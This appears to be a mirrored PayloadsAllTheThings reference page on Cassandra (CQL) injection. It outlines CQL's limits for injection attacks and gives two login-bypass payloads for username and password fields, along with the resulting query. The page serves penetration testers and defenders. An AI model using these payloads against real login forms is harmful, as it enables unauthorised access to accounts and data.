cassandra-injection.md (2397B)
1 --- 2 title: "Cassandra Injection" 3 topic: "SQL Injection" 4 topicSlug: "sql-injection" 5 sourcePath: "SQL Injection/Cassandra Injection.md" 6 sourceUrl: "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/3ac27901c711/SQL%20Injection/Cassandra%20Injection.md" 7 sha: "3ac27901c711" 8 isReadme: false 9 --- 10 11 # Cassandra Injection 12 13 > Apache Cassandra is a free and open-source distributed wide column store NoSQL database management system. 14 15 ## Summary 16 17 * [CQL Injection Limitations](#cql-injection-limitations) 18 * [Cassandra Comment](#cassandra-comment) 19 * [Cassandra Login Bypass](#cassandra-login-bypass) 20 * [Example #1](#example-1) 21 * [Example #2](#example-2) 22 * [References](#references) 23 24 ## CQL Injection Limitations 25 26 * Cassandra is a non-relational database, so CQL doesn't support `JOIN` or `UNION` statements, which makes cross-table queries more challenging. 27 28 * Additionally, Cassandra lacks convenient built-in functions like `DATABASE()` or `USER()` for retrieving database metadata. 29 30 * Another limitation is the absence of the `OR` operator in CQL, which prevents creating always-true conditions; for instance, a query like `SELECT * FROM table WHERE col1='a' OR col2='b';` will be rejected. 31 32 * Time-based SQL injections, which typically rely on functions like `SLEEP()` to introduce a delay, are also difficult to execute in CQL since it doesn’t include a `SLEEP()` function. 33 34 * CQL does not allow subqueries or other nested statements, so a query like `SELECT * FROM table WHERE column=(SELECT column FROM table LIMIT 1);` would be rejected. 35 36 ## Cassandra Comment 37 38 ```sql 39 /* Cassandra Comment */ 40 ``` 41 42 ## Cassandra Login Bypass 43 44 ### Example #1 45 46 ```sql 47 username: admin' ALLOW FILTERING; %00 48 password: ANY 49 ``` 50 51 ### Example #2 52 53 ```sql 54 username: admin'/* 55 password: */and pass>' 56 ``` 57 58 The injection would look like the following SQL query 59 60 ```sql 61 SELECT * FROM users WHERE user = 'admin'/*' AND pass = '*/and pass>'' ALLOW FILTERING; 62 ``` 63 64 ## References 65 66 * [Cassandra injection vulnerability triggered - DATADOG - January 30, 2023](https://web.archive.org/web/20230130053010/https://docs.datadoghq.com/fr/security/default_rules/appsec-cass-injection-vulnerability-trigger/) 67 * [Investigating CQL injection in Apache Cassandra - Mehmet Leblebici - December 2, 2022](https://web.archive.org/web/20251213065510/https://www.invicti.com/blog/web-security/investigating-cql-injection-apache-cassandra)